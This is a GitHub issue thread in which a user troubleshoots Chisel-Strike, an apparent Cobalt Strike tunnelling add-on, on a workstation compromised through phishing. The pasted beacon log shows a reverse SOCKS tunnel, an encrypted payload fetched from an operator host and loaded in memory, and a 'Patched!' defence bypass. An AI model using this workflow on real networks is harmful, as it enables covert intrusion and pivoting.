
Exception has been thrown by the target of an invocation.

fredericgoossens opened this issue · 3 comments

Hello, the project looks very neat but unfortunately I'm having some issues. here is the output:

[03/23 15:14:48] beacon> chisel-tms server -p 2000 --reverse
[03/23 15:14:48] [*] ____ _  _ _ ____ ____ _       ____ ___ ____ _ _  _ ____ 
[03/23 15:14:48] [*] |    |__| | [__  |___ |    __ [__   |  |__/ | |_/  |___ 
[03/23 15:14:48] [*] |___ |  | | ___] |___ |___    ___]  |  |  \ | | \_ |___ 
[03/23 15:14:48] [*] -------------------------------------------------------
[03/23 15:14:48] [*] Author - m3rcer	github.com/m3rcer/Chisel-Strike
[03/23 15:14:48] [*] -------------------------------------------------------
[03/23 15:14:48] [*]                                                         
[03/23 15:14:48] [*] Executing On Linux Teamserver: /opt/Chisel-Strike/chisel-modules/chisel64 server -p 2000 --reverse
[03/23 15:15:20] beacon> chisel-tls client R:socks
[03/23 15:15:20] [-] Unknown command: chisel-tls client R:socks
[03/23 15:15:29] beacon> chisel client R:socks
[03/23 15:15:29] [*] ____ _  _ _ ____ ____ _       ____ ___ ____ _ _  _ ____ 
[03/23 15:15:29] [*] |    |__| | [__  |___ |    __ [__   |  |__/ | |_/  |___ 
[03/23 15:15:29] [*] |___ |  | | ___] |___ |___    ___]  |  |  \ | | \_ |___ 
[03/23 15:15:29] [*] -------------------------------------------------------
[03/23 15:15:29] [*] Author - m3rcer	github.com/m3rcer/Chisel-Strike
[03/23 15:15:29] [*] -------------------------------------------------------
[03/23 15:15:29] [*]                                                         
[03/23 15:15:29] [*] Base64 args are: Y2xpZW50IDEwLjEwLjE2LjE4NjoyMDAwIFI6c29ja3M=
[03/23 15:15:30] [*] Hosted /SharpChisel.xor @
[03/23 15:15:30] [*] Base64 XOR URL is: aHR0cDovLzEwLjEwLjE2LjE4Njo4MC9TaGFycENoaXNlbC54b3I=
[03/23 15:15:30] [+] host called home, sent: 116683 bytes
[03/23 15:15:31] [+] received output:
[!] ~Flangvik - Arno0x0x Edition - #NetLoader
[+] Patched!
[+] All arguments are Base64 encoded, decoding them on the fly
[+] Decrypting XOR encrypted binary using key 'socks5oversocks4'
[+] Starting with args 'client R:socks'

[03/23 15:15:36] [+] received output:
[!] Damn, it failed, too bad
[!] Exception has been thrown by the target of an invocation.

I already tried to compile SharpChisel myself, but it didn't fix the issue :(

Hey thanks!, not quite sure. Could possibly be a firewall issue / .NET framework incompatibility on beacon host / bind port issues / chisel issue. Try troubleshooting by checking if the listener is hosted via netstat -an or ss -lntp and digging further through each detail or do share your setup.

My setup looks like the following:

KALI (Cobalt Strike) ===reverse shell obtained by phishing===> Workstation

I'm currently using chisel proxies running on the workstation (just by using the executable).. that works fine but i'm still unable to use chiselstrike

Do test SharpChisel manual execution first on your target, and if that works with your chisel teamserver try recompiling the project with those versions.